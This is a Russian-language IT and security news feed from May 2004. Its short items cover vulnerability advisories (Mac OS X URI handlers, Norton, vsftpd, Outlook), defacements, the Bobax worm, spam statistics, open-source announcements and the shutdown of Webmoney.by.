21 мая приостановил свою работу платёжный ресурс Webmoney.by, занимающийся обслуживанием клиентов платежной системы WebMoney Transfer в Беларуси.При этом на самом сайте размещено достаточно традиционное для подобных случаев объявление: "Сервис WEBMONEY.BY не работает. Все вопросы по возмещению непогашенных кредитов будут решены в течение ближайших дней. Приносим свои извинения и благодарим за понимание". По информации беларусских СМИ, причиной стало закрытие милицией офиса службы. Это произошло после открытия уголовного дела по обвинению в незаконной предпринимательской деятельности против владельцев Webmoney.by. Более конкретно – в осуществлении валютных операций без лицензии. По нему хозяевам грозит срок до 5 лет лишения свободы. Сообщается также, что в офисе Webmoney.by был произведен обыск с изъятием документов и компьютерной техники.
SmartBit.info

25/05/2004 20:18 CA пообещала открыть исходники БД Ingres
Известная компания CA (Computer Associates International) в понедельник сделал очень важное заявление, в котором пообещала открыть исходный код известной СУБД Ingres, а также начать течное сотрудничество в других open-source проектах. Компания планирует в течение 90 дней выложить исходный код для сборки СУБД Ingres для ОС Linux. Также компания предложила open-source лицензию, которая получила название CA Trusted Open Source License (CA-TOSL), которая призвана подтвердить легальность исходного кода корпоративным пользователям.
Подробности

25/05/2004 19:43 Сравнение безопасности ОС Linux и Windows
Довольно интересная статья опубликована на сайте NewsForge. Название статьи "Linux and Windows security compared". Автором статьи является Stacey Quandt - аналитик фирмы Quandt Analytics. Естественно, сама статья не претендует на абсолютную истину в части компьютерной безопасности, однако написана довольно интересно и без излишней (с моей точки зрения - прим. ньюсмейкера) прверженности одной или другой ОС (что бывает довольно часто в подобного рода обзорах). Обе ОС рассмотрены с точки зрения различных характеристик, как то: безопасность основных компонентов ОС, безопасность сетевых протоколов и сетевого стека, система выпуска патчей (заплаток) и своевременность их выхода и многое другое. Кстати, все выводы оформлены в виде результирующей таблицы.
Статья

25/05/2004 19:23 Уязвимость в VocalTec Gateways позволяет провести DoS-атаку
Secunia сегодня опубликовала сообщение об обнаруженной уязвимости в VocalTec Telephony Gateways. Уязвимость присутствует в VocalTec Telephony Gateway VGW120 / VGW480 благодаря ошибке при обработке некоторых пакетов H.323 траффика приводящей к краху системы. Эксплоит существует. Об уязвимости сообщил Тагов Евгений (Tagoff Eugene) на securitylab.ru.
Secunia Advisory

25/05/2004 15:02 Windows 98 на Pocket PC КПК - уже реальность
Энтузиаст по кличке Miracle с форумов сайта PDAi.org сумел достичь почти невозможного – запустить на своем ASUS MyPAL КПК Microsoft Windows 95 и Windows 98SE, сообщает mobile-review.com. Речь, конечно, не идет об установке Windows 95 как основной ОС КПК – тут на помощь пришла портированная версия эмулятора x86-компьютеров Bochs x86, а образ жесткого диска с установленной ОС был подключен с настольного ПК через WiFi-интерфейс. Сообщается, что скорость эмуляции оставляла желать лучшего, но сам факт, а также тенденции к увеличению производительности КПК вселяют надежду на лучшее :)
Подробности

25/05/2004 14:29 Загрузку веб-страниц ускорили
Устройства и программное обеспечение, ускоряющие доступ к ресурсам интернета, обещают немалые преимущества как профессионалам в области сетевых технологий, так и рядовым пользователям. Проблема скорости загрузки веб-страниц во многом обусловлена устаревшей веб-технологией, которая была создана еще в 70-е годы. Американская компания NetScaler, поставщик сетевых технологий, разработала устройства, которые помогут решить эту проблему. По мнению Б. Джагадиша (B.V. Jagadeesh), основателя компании NetScaler, задержки в загрузке страниц во многом обусловлены действующим в глобальной паутине протоколом межсетевого взаимодействия ТСР/IP. Он требует отдельной команды каждый раз, когда происходит загрузка одного из объектов веб-страницы - текста, таблиц, графики, анимации и т.д. Таким образом, для каждого объекта требуется отдельное соединение, и если объектов на странице 40-50, то и соединений требуется столько же. Компьютер при этом принимает и отправляет для каждого объекта команды, подтверждающие нормальный процесс загрузки. Крупные фирмы, обслуживающие большое число запросов своих сотрудников, специально приобретают серверы, которые берут на себя функцию исправления ошибок, возникающих при загрузке с помощью протокола ТСР/IP. NetScaler предложила устройства, которые устанавливаются перед сервером и выполняют единственную функцию - поддерживать открытыми соединения с теми объектами на веб-странице, которые уже открыты. Теперь вместо того, чтобы открывать и закрывать многочисленные соединения, можно ограничиться только небольшим числом этих соединений. В итоге можно сократить и число серверов, обслуживающих то же количество клиентов. Одной из самых крупных компаний, которая заинтересована в приобретении устройств, является Google, которая уже закупила около 70 устройств NetScaler для обеспечения услуги поиска изображений в Сети. Несомненно, что подобные устройства пригодятся самым разным интернет-компаниям, работающим в сфере электронной торговли, и информационным порталам.
Источник

25/05/2004 13:11 Один из сайтов Microsoft был атакован хакерами
The Inquirer со ссылкой на Zone-h сообщает, что вчера был задефейсен один из веб сайтов Microsoft-а www.microsoft.com/mspress/uk/. "Португальский хакер представляющий группу "Outlaw group" задефейсил ультра защищенный сайт используя хорошо известную уязвимость, которая должна была быть пропатчена месяц назад", говоится в сообщении. Хакер изменил страницу, содержащую информацию о пресс-релизах, оставив сообщение "Owned OutLaw Group by Pharoeste e Wolfblack". Атакующий использовал "SQL injection" атаку на администранивной странице. Скриншот можно посмотреть здесь.Расстраивает тот факт, говорится в сообщении, что сайт, содержащий пресс-релизы описывающие патчи и пропагандирующий индустриальную безопасность, сам не был пропатчен вовремя. Microsoft узнала о случившемся из сообщения Zone-h, а измененная страница какое-то время находилась в кеше Googl-а. Представитель Zone-h сообщил, что эта хакерская группа заявила о себе в декабре прошлого года, сломав один бразильский сайт. Сейчас на ее счету более 60 сайтов.
theinquirer.net

25/05/2004 11:50 Для разработчиков Linux введены новые правила
В понедельник организация Open Source Development Labs, продвигающая Linux, сообщила, что она принимает новую систему приёмки с целью лучшего отслеживания и документирования вкладов кода в ядро ОС. Организация, в которой работает создатель Linux Линус Торвальдс, предупреждает, что по новой системе дополнения в ядро Linux смогут вносить только те разработчики, которые согласятся передавать код в соответствии с «надлежащими» лицензиями open source. Система добавляет соглашение, называемое «Сертификатом авторства разработчика» (Developer's Certificate of Origin, DCO), гарантирующее выражение признательности программистам за дополнения и производные работы, а также тем, кто «собирает материалы и продвигает их без изменений вверх по дереву ядра». Соглашение DCO призвано исключить вопросы и юридические споры по поводу авторства на фрагменты кода Linux. В прошлом году SCO Group, которой принадлежат некоторые права интеллектуальной собственности по Unix, подала в суд на IBM за нарушение контракта: IBM якобы перенесла в Linux её технологию Unix, которая должна была оставаться в тайне. Новая система не поможет дать ответы на вопросы об уже включённом в Linux коде. Но она полезна для будущих релизов, пояснил директор Open Source Development Labs Стюарт Коуен. «Очевидно, что это относится только к коду, предоставляемому с сегодняшнего дня. Однако можно рассчитывать, что это окажет серьёзное влияние уже на будущую версию 2.7 (ядра Linux), которая должна выйти через год».
Подробнее об DCO

25/05/2004 11:37 Microsoft сделает ОС для суперкомпьютеров
Корпорация Microsoft готовится к экспансии в очередной рыночной нише. На этот раз целью софтверного гиганта являются операционные системы для высокопроизводительных вычислительных кластеров, где в настоящее время господствует Linux, cообщает "Компьюлента". Сейчас кластеры, состоящие из большого числа относительно недорогих стандартных компьютеров, соединенных высокоскоростными магистралями передачи данных, являются самым популярным типом суперкомпьютеров. Абсолютное большинство новых высокопроизводительных вычислительных систем основаны именно на кластерной схеме. В настоящее время в подразделении по разработке серверного программного обеспечения действует специальный отдел высокопроизводительных вычислений (High Performance Computing или HPC). По сообщению CNET News, сейчас специалисты заняты созданием новой модификации Windows Server 2003 под названием Windows Server HPC Edition, которая и будет предназначена для вычислительных кластеров. Руководит работами над новой модификацией Windows Кайрил Фаэнов, причем в отдел постоянно набираются новые сотрудники. Пока, впрочем, неясно, когда Windows Server HPC Edition появится на рынке. По самым смелым прогнозам, система увидит свет после выпуска первого сервис-пака к Windows Serer 2003 в этом году. Однако более вероятной датой представляется 2005 год, когда Microsoft планирует выпустить Windows Server 2003 R2 - вторую редакцию своей последней серверной ОС. Помимо самой операционной системы, планируется выпустить и ориентированные на кластерные вычисления инструментарии для разработчиков прикладного ПО.
Подробности

25/05/2004 10:42 "Моссад" набирает агентов через Интернет
Израильская служба внешней разведки "Моссад" начала рекрутинговую кампанию через свой официальный сайт в Интернете, сообщает Reuters. Как следует из информации, размещенной на сайте, "Моссаду" требуются как агенты для выполнения специальных заданий и информационные аналитики, так и простые водители и официанты. По словам шефа израильской разведки Меира Дагана (Meir Dagan), открытие вакансий через Интернет свидетельствует о новом, более открытом курсе "Моссада". Ранее агенты-ветераны, уходившие на пенсию, приводили на свое место друзей. Теперь разведслужба намерена привлечь талантливых людей "со стороны". "Главная опора "Моссада" - это люди, работающие у нас", - заявил Меир Даган.
Источник

24/05/2004 14:45 NetSQUID - инструмент для интеграции Snort и IPTables
Довольно полезный для системных администраторов инструмент под названием NetSQUID - представляет собой скрипт на Perl, основное назначение которого - организовать взаимодействие IDS Snort с файрволлом Linux - IPTables. На основании анализа предупреждений, выдаваемых Snort позволяет при помощи IPTables блокировать источник атак (в том числе и даже в первую очередь - вируссных). Блокируемые сайты автоматически разблокируются через определённый промежуток времени.
Сайт проекта

24/05/2004 14:28 Компьютерные преступления: 15 раскрыто, 85 – в тени
По механизму и способам совершения преступления в сфере компьютерных технологий имеют высокий уровень латентности. По данным Национального отделения ФБР по компьютерным преступлениям, от 85 до 97% компьютерных посягательств даже не выявляются. По оценкам иных экспертов, латентность «компьютерных» преступлений в США достигает 80%, в Великобритании – до 85%, в ФРГ – 75%, в России – более 90%. За рубежом, где накоплена достаточно большая и достоверная статистика компьютерных преступлений, до суда доходят меньше 1% нарушений. При этом, по утверждению специалистов, ревизия в состоянии выявить не более 10% электронных хищений. Из 100 «пластиковых» преступлений раскрываются 15. По данным МВД России, каждый год карточные мошенники наносят банкам до 4 миллиардов долларов прямого ущерба. Еще в два миллиарда обходится распутать последствия «взломов». Кроме того, клиент, обидевшись на ненадежность системы своего банка, может просто отозвать из него все свои средства. Большинство краж от беспечности, - объясняет первый заместитель начальника Главного управления МВД России, курирующий линию «К», Константин Мачабели. - Вот исчезли с вашей карточки 100 долларов. Вы подумаете: «Может, потратила и забыла?». А многие люди до сих пор пишут пин-коды прямо на картах. Часто «наши» жулики воруют деньги с карточек иностранцев. Информации с их банков не дождешься. Оттого процент раскрываемости карточных махинаций - около 15. Однако наши банки доверяют нам все больше, потому что вместе мы способны проследить любую махинацию и выйти на вора.
Статья crime-researh.ru

24/05/2004 14:09 Уязвимость в OpenBSD
Сообщаетя об обнаружении уязвимости в ОС OpenBSD. Из-за некорректной обработки ядром данных при чтении данных из файловой системы proc возможно получение доступ к защищённым областям памяти ядра. Указывается на наличие некорректности обработки данных в файле иссходного кода procfs_cmdline.c. Патчи доступны на сайте производителя (www.openbsd.org).
Описание

24/05/2004 13:53 В Zone Alarm добавят антивирус
Теперь популярный фаервол будет содержать в себе функции антивируса. Об этот сообщил в понедельник Фред Фельман (Fred Felman) вице-президент по маркетингу Zone Labs, независимого отделения Check Point Software Technologies. Zone Labs лицензировала антивирусную технологию eTrust Antivirus у Computer Associates International. Ожидается, что новое добавление к линейке продуктов позволит Zone Labs посоперничать с двумя основными игроками рынка продуктов для домашней безопасности - Symantec Norton Internet Security и Network Associates McAfee Internet Security Suite. Антивирусная функция будет доступна только в коммерческой версии Zone Alarm, хотя "basic" конфигурацию фаервола можно скачать с веб сайта компании бесплатно.
CNET News.com

24/05/2004 13:52 Электронная почта США завалена спамом
Согласно сообщениям, более 80% отправленных писем в США - спам. Согласно отчету MessageLabs, две трети всех электронных писем во всей мировой сети имеют рекламный характер. В тоже время в США таких писем - четыре из пяти. В Европе ситуация несколько лучше, чем в Америке. В Англии, например, спам составляет только половину почтовой корреспонденции. В Германии - 41%, а в Австрии 32%. Этот отчет компания составила на основе количества спама отфильтрованного ее спам-фильтрами, установленными более чем у 8500 клиентов по всему миру. Представитель MessageLabs сообщил, что еще год назад соотношение составляло 50/50, но, учитывая такие темпы роста, можно предполагать что количество спама вырастет и будет более 90% за год. Другая компания, занимающаяся разработкой спам-фильтров, Postini Inc сообщила на слушаниях в конгрессе о подобных результатах. По ее мнению, 83% электронных сообщений за последний месяц были отфильтрованы у пользователей и содержали спам. Высоким уровнем спама и его ростом продиктовано принятие правительством США закона "Can Spam Act". Однако, как заявила Postini в конгрессе, спамеры находят все новые способы, чтобы обойти этот закон.
theinquirer.net

24/05/2004 12:45 Операционная система для самых мощных в мире ноутбуков
Американская компания Liebermann, занимающаяся выпуском эксклюзивных компьютеров, в частности, ноутбуков на процессорах Pentium 4 Extreme Edition, объявила о создании собственной операционной системы под названием L OS, cообщает "Компьюлента". Эта система основывается на коде Linux и включает поддержку ряда фирменных технологий Liebermann - PuRam Drives, Instant-On Technology, SuperBIOS, CacheFlow, а также новой высокопроизводительной периферии и 64-разрядных процессоров. По заявлениям компании, главной задачей при создании L OS было максимально полно удовлетворить все требования потребителей и создать наиболее удобную, быструю и стабильную вычислительную платформу. В L OS будет встроен эмулятор, обеспечивающий совместимость с приложениями для Windows. В новой ОС также реализуется гибкое управление оборудованием, включая динамическое повышение и снижение тактовой частоты процессора. В Liebermann планируют выпускать две версии операционной системы - для серверов и для клиентских компьютеров. В компании утверждают, что L OS будет распространяться в комплекте со всем необходимым для современного компьютера программным обеспечением. При этом система будет использовать тот же интерфейс, что и WinXP4L - специальная модификация Windows XP, используемая Liebermann. Впрочем, Windows XP также будет устанавливаться на компьютеры компании. Пока L OS находится на ранней стадии разработки, однако уже в скором будущем вместе с компьютерами Liebermann будет поставляться предварительная альфа-версия этой ОС.
Подробнее

24/05/2004 12:21 Спамеры создают себе отборную армию зомби
Червь Bobax, меньше чем за неделю породивший целых четыре своих варианта, стал одним из первых компьютерных червей, которые определяют пропускную способность зараженного ими хоста, чтобы понять, стоит ли использовать его в качестве зомбированных источников спама. Bobax задействует комбинацию уязвимостей Windows, эксплуатировавшихся червями Sasser и MSBlast. Он вряд ли получит широкое распространение, так как крупные компании уже установили соответствующие заплатки, но его поведение показывает, что писатели вирусов и профессиональные спамеры получили контроль над более чем достаточным количеством компьютеров — и теперь могут выбирать, какими из них им воспользоваться. Директор финской антивирусной компании F-Secure Микко Хиппонен отмечает, что хотя червь Bobax заражает любые уязвимые машины, в него встроена утилита, которая помогает авторам вируса решить, достаточно ли высока скорость связи этой машины с интернетом, чтобы её стоило включать в свою армию зомбированных источников спама. Вирус определяет производительность, приказывая заражённому компьютеру загрузить крупный файл с общедоступного FTP-сайта. Собрав некоторую статистику о пропускной способности линии связи, он передает её автору вируса, чтобы тот мог использовать компьютер в соответствии с требованиями спамера. «У спамеров столь широкий выбор машин, что они могут позволить себе выбирать лучшие — с самыми быстрыми каналами связи и самой высокой производительностью», — говорит Хиппонен.
Подробности

24/05/2004 12:09 "Фотошоп" внутри QuarkXpress
Представители компании Quark продемонстрировали на выставке DRUPA 2004 модуль расширения для настольной издательской системы QuarkXpress 6, реализующий функции обработки изображений - QuarkVista. В компании надеются, что встроенный в QuarkXpress редактор такого рода обеспечит пользователям экономию времени по сравнению с системами обработки изображений, предлагаемыми сторонними производителями. QuarkVista позволяет производить цветовую коррекцию иллюстраций в публикации, обрабатывать их при помощи различных фильтров, масштабировать, обрезать, поворачивать и "перекашивать". При этом в само изображение никаких изменений не вносится, так что все модификации можно в любое время отменить или подкорректировать. Модуль также позволит выполнять преобразования между различными форматами графических файлов.
Источник

24/05/2004 11:33 Организаторы Олимпиады в Афинах ждут волны хакерских атак
Организаторы Олимпийских игр в Афинах готовятся к отражению волны кибератак против официальных интернет-ресурсов соревнований, сообщает Silicon.com. Обеспечивать IT-безопасность Олимпиады поручено компании Atos Origin, подписавшей с Международным олимпийским комитетом (МОК) контракт на период с 2002 по 2008 год. По словам представителей Atos Origin, зимой 2002 года сетевые ресурсы Олимпийских игр в Солт-Лейк-Сити подверглись нескольким сотням атак, и активность хакеров во время соревнований в Афинах снизится вряд ли. «Мы уже зафиксировали рост подозрительной активности вроде проверки надежности сетевых экранов», - сообщил менеджер Atos Origin Ян Ноблот (Yan Noblot).
Источник

23/05/2004 20:08 В тюрьму за покупку пиратского диска
Миллионы туристов, приезжающих погреться на солнышке в Грецию, должны серьезно задуматься перед тем, как купить приглянувшийся им пиратский музыкальный диск. На прошлой неделе впервые в истории страны афинский суд приговорил одного такого любителя музыки к трем месяцам лишения свободы. Международная федерация звукозаписывающей индустрии (IFPI) настроена по боевому. "Это не символическая мера. Мы решительно намерены судить покупателей, и в этом нас поддерживают государственные власти", - говорит Ион Стамбоулис, представитель федерации. По данным федерации, в Греции - самый высокий уровень музыкального пиратства в Западной Европе. Ежегодно там продается незаконно около 10 млн. дисков (столько же продается в официальных лицензионных магазинах) по цене 6 евро за штуку. По словам Стамбоулиса, пиратский бизнес в Греции контролирует "нигерийская мафия". "До сих пор мы акцентировали свое внимание на продавцах, однако греческие суды обычно прибегали к несерьезным наказаниям, и они быстро возвращались к своему делу", - говорит Стамбоулис. Безусловно, основные клиенты пиратов - это туристы. А к летней Олимпиаде их в Афинах будет еще больше. Борьба с самими продавцами идет в Греции уже давно. Около тысячи пиратов прошли через греческие суды за последние несколько лет. Но вот судебное преследование покупателей - дело новое.
bbc.co.uk

23/05/2004 19:21 Развитие ситуации с уязвимостью в Mac OS X URI Handler
Secunia выпустила новое предупреждение о уязвимости в Mac OS X URI Handler. Новая брешь, описанная в сообщении, позволяет выполнить на машине пользователя произвольный код без использования ранее обнаруженной уязвимости в "help" URI обработчике. Код, который может представлять скрипт-файл или другой исполняемуй модуль, может быть загружен на уязвимую машину без уведомления пользователя через брешь в "disk" URI обработчике. Об обеих уязвимостях сообщалось в SA11622 буквально парой дней ранее. Новая уязвимость позволяет выполнить код с примантированных образов диска двумя способами: 1) Образ диска или том (например AFS, SMB, FTP, или DAV) может зарегистрировать произвольный URI-обработчик, который выполнит код, помещенный на этот том; 2) Образ диска или том может изменить неиспользующийся URI-обработчик (например TN3270) для выполнения кода, помешенного на этот том. Secunia сообщает, что обострила значение проблемы (степень риска которой - "чрезвычайно критичный") из-за того, что по умолчанию можно загрузить и примонтировать образ диска используя два известных метода ( загрузка и выполнение "safe" файла и "disk" URI). Кроме того, сообщается, что возможно монтирование томов используя другие методы, такие как SMB, AFS, FTP, DAV и др. Уязвимость подтверждена на полностью пропатченной Mac OS X системе (включая последний патч выпущенный Apple - "Security Update 2004-05-24 for Mac OS X", который закрывает "help" URI уязвимость). Сообщается что существуют эксплоиты использующие "ftp" и "afp" "методы". Apple пока не выпустила патч, закрывающий эту уязвимость.
secunia.com

23/05/2004 17:14 Уязвимость в Norton Antivirus 2004
Японская Secure Net Service(SNS) обнаружила уязвимость в популярном антивирусе Norton Antivirus 2004. Уязвимость связана с ActiveX-компонентой антивируса. Уязвимость позволяет запустить на удаленной машине любую уже существующую там программу с правами текущего пользователя, а также привести к возможной DoS-атаке. Однако для успешного проведения атаки необходимо завлечь жертву на Вэб-сайт, страница которого будет оформлена соответствующим образом. Рекомендуется обновить антивирус через традиционную службу LiveUpdate.
Описание

23/05/2004 16:36 Удаленный отказ в обслуживании против vsftpd
Уязвимость обнаружена в vsftpd - FTP-сервера, включённого, например, в состав дистрибутива Fedora Core от Red Hat. Злонамеренный пользователь может вызвать отказ в обслуживании. Уязвимость связанна с ошибкой внутри обработчика подключений. Удаленный пользователь может завесить или аварийно завершить работу целевого сервера. Для устранения уязвимости рекомендуется обновиться до версии 1.2.2.
Источник

23/05/2004 16:21 Auditor security collection - дистрибутив для специалистов по безопасности
Max Moser, представляющий швейцарскую компанию Moser Informatik, специализирующейся на исследовании различных аспектов компьютерной безопасности представил на днях свой новый дистрибутив, названный им Auditor security collection. Этот дистрибутив представляет собой так называемое семейство Live CD на базе Linux-дистрибутива Knoppix. Дистрибутив включает в себя огромный набор утилит и инструментов для тестирования систем на уязвимость (как локальных, так и удалённых). В составе дистрибутива около 300 различных инструментов, среди которых различные сканеры, трэйсеры, брутфорсеры, инструменты для оформления отчётов по безопасности. Вот лишь некоторые из них: snmpwalk, LinNeighborhood, nmblookup, Xprobe2, p0f, queso, nessus, whisker, nmap, ettercap и многое-многое другое. После загрузки с CD-ROM Вы фактически получаете в распоряжение полностью работоспособную систему для проверки как собственного, так и удалённых серверов. Распространяется на условиях GPL 2.0. ISO-образ, который можно скачать, занимает около 520 МБ.
О проекте

23/05/2004 15:34 Правила SNORT для фиксирования атаки на CVS
Ранее мы писали, что выпущены 2 эксплоита, использующие обнаруженную e-matters уязвимость в популярном в мире открытых систем пакете CVS. Эксплоиты для ОС Linux/FreeBSD, Solaris были выпущены компанией K-OTik Security. Однако, специалисты по компьютерной безопасности из SANS опубликовали набор правил для системы определения пропыток вторжения (IDS) Snort, которые позволяют зафиксировать факт атаки и отразить его в соответствующих лог-файлах. Правила, как обычно, рекомендуется прописать в файле local.rules.
Правила

23/05/2004 15:10 ФБР готовится поддержать антиспамерский порыв Буша
20 мая руководство ФБР представило сенаторам результаты своей работы, направленной на выявление и преследование спамеров, сообщает ZDNet. С момента подписания Джорджем Бушем закона, предусматривающего уголовное наказание за организацию и проведение массовой рассылки электронных писем рекламного характера, агенты ФБР «установили личности более 100 наиболее активных спамеров» и намереваются привлечь 50 из них к суду в следующем году. «Подобные случаи могут рассматриваться как вторжение в частную жизнь в компьютерной сфере или онлайновое мошенничество и подпадают под положения многих федеральных и местных законов, в том числе принятого недавно антиспамерского акта», - заявила заместитель руководителя департамента ФБР по борьбе с киберпреступлениями Жана Монро (Jana Monroe). Она не стала утомлять законодателей деталями, а лишь поведала им об «инициативе, благодаря которой на основании антиспамерского акта будут начаты гражданские и уголовные дела». Монро оказалась в числе немногочисленных свидетелей, сообщающих сенаторам о состоянии борьбы со спамом после принятия федерального закона 1 января этого года. «С мая прошлого года, когда мы обсуждали проблему спама в последний раз, поток электронных писем рекламного характера растет высокими темпами. Спам сейчас составляет от 64 до 83 процентов всего почтового трафика», - рассказал сенатор Джон Маккейн.
viruslist.ru

23/05/2004 14:05 ВЕА надеется вызвать open source-бум проектом Beehive
В надежде обеспечить более широкое использование своего ПО BEA Systems планирует организовать проект open source вокруг инструмента разработки Java — WebLogic Workshop. В среду компания опубликовала детали проекта open source Beehive Project, основанного на фрагментах кода, входящих в инструментарий программирования BEA Workshop. Кроме того, BEA надеется подстегнуть создание controls — готовых Java-компонентов на базе компонентной модели ВЕА. Код Beehive, который будет адаптирован инженерами ВЕА, должен быть открыт этим летом на условиях лицензии open source в стиле BSD. BEA ещё не решила, какая организация будет ведать проектом open source. BEA WebLogic Workshop — это визуальный инструмент разработки, предназначенный для упрощения программирования на языке Java и облегчающий интеграцию бизнес-приложений. Заказчики и аналитики хвалят этот инструмент за его способность имитировать стиль визуального программирования, популяризованный Microsoft Visual Basic. Программное обеспечение, которое BEA планирует передать сообществу open source, представляет собой то, что компания называет «средой приложений» (application framework) — набор утилит для внедрения Java-приложений. Например, Beehive включает инструменты для управления событиями при работе многошаговых веб-сервисов или для проектирования последовательности отображений веб-страниц в приложении портала. Руководители ВЕА сказали, что компания не планирует предоставление разработчикам open source каких-либо других «run time»-программ, таких как приложение WebLogic или программное обеспечение портала. Сейчас среда приложений Beehive работает только со средой разработки BEA WebLogic Workshop. Это означает, что когда программист на Java пишет приложение в среде BEA Workshop, это приложение будет исполняться только программным обеспечением Java-сервера ВЕА. Делая программное обеспечение Beehive проектом open source, ВЕА позволит программистам использовать любой инструмент разработки Java и потенциально устанавливать его на других пакетах ПО Java-сервера.
О проектк Beehive

22/05/2004 17:36 Apple выпустила патчи для Mac OS X, закрывающие уязвимости в URI Handler
Apple выпустила патчи для Mac OS X версий 10.2.8 и 10.3.3 закрывающие недавно обнаруженные уязвимости.Напомним, уязвимость находилась в обработчике "help" URI и позволяла запускать произвольные скрипты (.scpt) с локального диска через стандартную команду "help:runscript". Также, настройки по умолчанию в Mac OS X броузерах позволяли загрузить и сохранить файл на жестком диске, в том числе и скрипт-файл, без уведомления пользователя через обработчик "disk" URI. Это позволяет крайне легко использовать уязвимость, пользователю достаточно сделать лишь один клик по линку. Secunia подняля рейтинг уязвимости до "чрезвычайно критичный" (Extremely critical) из-зи того, что брешь очень просто использовать и уже существует множество работающих эксплоитов. Уязвимость подтверждена в Macintosh OS X броузерах Safari 1.2.1 (v125.1) и Internet Explorer 5.2.
Original Advisory, US-CERT VU#210606, US-CERT VU#578798

22/05/2004 17:08 В американской "Матрице" нашли 120 тысяч террористов
Американская компания Seisint передала правительству США результаты работы своей антитеррористической информационной системы MATRIX (аббревиатура от Multistate Anti-Terrorist Information Exchange), сообщает "Компьюлента". Всего власти получили информацию о 120 тысячах подозрительных лиц. Выборка осуществлялась методом data mining из специальной базы данных, в которую сводится самая разнообразная информация о людях: возраст, пол, национальность, данные о водительских правах, лицензии на управление летательными аппаратами, кредитная история и связь с лицами, связь которых с террористическими организациями установлена достоверно. Помимо этого, в базе данных MATRIX находятся следственные материалы полиции и некоторые другие документы. Создание системы MATRIX было начато после терактов 11 сентября. Первоначально в создании базы данных участвовали 13 американских штатах, в которых проживает более половины населения страны. Министерство внутренней безопасности США выделило на эти работы 8 млн. долларов. Однако сейчас в работе над системой принимают участие только пять штатов: Флорида, Огайо, Пенсильвания, Коннектикут и Мичиган. Основные причины сокращения числа участников программы заключаются в высоких издержках и сомнениях в надлежащем уровне соблюдения конфиденциальности. В частности, Американский союз за гражданские свободы (ACLU) выражает серьезную озабоченность с связи с работой MATRIX и просит Конгресс запретить дальнейшее финансирование этой системы.
yahoo.com

22/05/2004 16:34 Oracle присоединилась к программе Microsoft для разработчиков
В четверг компании сообщили, что Oracle согласилась улучшить взаимодействие своей СУБД с инструментами разработки Microsoft. Oracle присоединилась к партнерской программе Microsoft Visual Studio и в этом году выпустит свободно загружаемое дополнение к инструментам разработки Microsoft Visual Studio .Net 2003. Как утверждает вице-президент отделения серверной технологии Oracle Прем Кумар, это дополнение облегчит создание Windows-приложений, которые обращаются к данным, хранящимся в БД Oracle. Разработчики много лет пользуются Visual Studio для создания подобных приложений, но «процесс написания кода остается довольно тяжёлым, — констатировал Кумар. — Мы стараемся организовать узлы беспрепятственной интеграции». Загружаемое дополнение облегчит этот процесс, позволив разработчикам обращаться к данным, хранящимся в таблицах БД Oracle, и отлаживать приложения на основе баз данных в среде Visual Studio, пояснил продакт-менеджер Microsoft Ник Эбботт. Соглашение делает «базы данных Oracle гражданами первого сорта» для разработчиков Visual Studio, сказал он. Это соглашение — одно из звеньев целой цепи анонсов Microsoft, связанных с технологической интеграцией. На прошлой неделе компания подписала соглашение с SAP о взаимодействии между соответствующими продуктами веб-сервисов. А в начале года Microsoft и Sun Microsystems согласились сгладить противоречия, чтобы вместе работать над установлением связи между своими продуктами.
zdnet.ru

22/05/2004 16:09 Хакеры вывели из строя крупный исламский сайт за антисемитизм
Исламский сайт Oumma.com уже десять дней не работает в результате атаки хакеров, последовавшей за антисемитскими публикациями на форуме сайта. Как сообщает газета Jerusalem Post, об этом заявил главный редактор ресурса Саид Бранин (Said Branine). По его словам, один из пользователей поместил на форуме антисемитскую фетву - религиозное предписание, в которой перечислялись 20 основных грехов евреев, как это записано в Коране. Сообщение было удалено через четыре часа после его появления, однако этого времени оказалось достаточно, чтобы его заметила французская журналистка из еженедельного журнала Marianne. Она написала и опубликовала статью, в которой задалась вопросом, каким образом появление на сайте подобных материалов согласуется с заявленной им целью "развития диалога между религиями". Через несколько часов после того, как журнал поступил в продажу, сайт, по словам его главного редактора, подвергся беспрецедентной атаке хакеров. На сервер было послано несколько миллионов запросов в течение небольшого промежутка времени, в результате чего он был перегружен и выведен из строя. Бранин рассказал, что хотя владельцы сайта сменили провайдера, хакеры оказались "слишком настойчивыми".
Подробности

22/05/2004 15:40 Хакер хакнул "хакеров"
Новость скорее из разряда курьёзных. :) TheInquirer со ссылкой на Zone-H сообщает о том, что веб сайт хакерской группы называющей себя "Хакеры Против Америки" - Hackers Against America (HAA) был задефейсен хакером. По информации той же Zone-H, недавно группа HAA сделала новый проект для атаки US серверов и разместила свой сайт по адресу http://hackusa.narod.ru (ранее мы сообщали об этой группе). Группа, пишет TheInquirer, сайт которой находился в глубине Российской Федерации, хвасталась связями с террористической организацией Аль-Каеда (странно, почему этой группой не заинтересовались "соответствующие" органы). Когда информация о связях HAA с террористами выплыла наружу, о ней также узнал Португальский хакер по имени Marcos. Он написал в HAA и получив ответ, по заголовкам письма узнал IP адресс и DNS сервер отправителя. Просканировав их он обнаружил, что там запущены BIND и FTP сервер. Далее TheInquirer пишет, HAA запустили там версию BIND, которая была настолько старой, что точно имела уязвимости о которых знают все хакеры. Считая себя экспертами в области сетевой безопасности, "хакеры" не устанавливали патчи. Marcos модифицировал DNS так, что когда веб мастер попытался зайти по FTP чтобы обновить сайт, он попал на FTP сервер Marcos-а. Когда веб мастер залогинился, Marcos получил логин и пароль к сайту. Задефейсил веб сайт, удалив предварительно весь контент, оставил о себе сообщение и испарился. Португалец Marcos написал "Этот сайт был удален за загрязнение названия "хакер" и за разрастание абсурдных и нелепых идей." Другая прореха в безопасности - оказалось, что хакеры использовали тот же пароль к почтовым ящикам на yahoo, которые Marcos тоже удалил. В заключении TheInquirer пишет, если Вы не предпринимаете даже самых простых шагов в сторону безопасности, то Вас несомненно хакнут. Кстати, на настоящий момент сайт всё находится в состоянии дефейса с надписью "Esse site foi tirado do ar permanentemente por sujar o termo hacker e por plantar idйias absurdas e ridнculas. MFAA (mflavio2k@hotmail.com)".
Статья

22/05/2004 15:08 Серьезная уязвимость в Microsoft Office Outlook 2003
Удаленный пользователь может внедрить специально обработанный Windows Media Player объект внутри rich text сообщения и затем внедрить в исходный код URL, ссылающийся на внедренный media файл. Когда целевой пользователь просмотрит сообщение, код сценария внутри media файла будет выполнен вне зависимости от установок безопасности Microsoft Outlook или настроек Windows Media Player.
Источник

21/05/2004 15:29 Растет риск атаки червя Lovgate
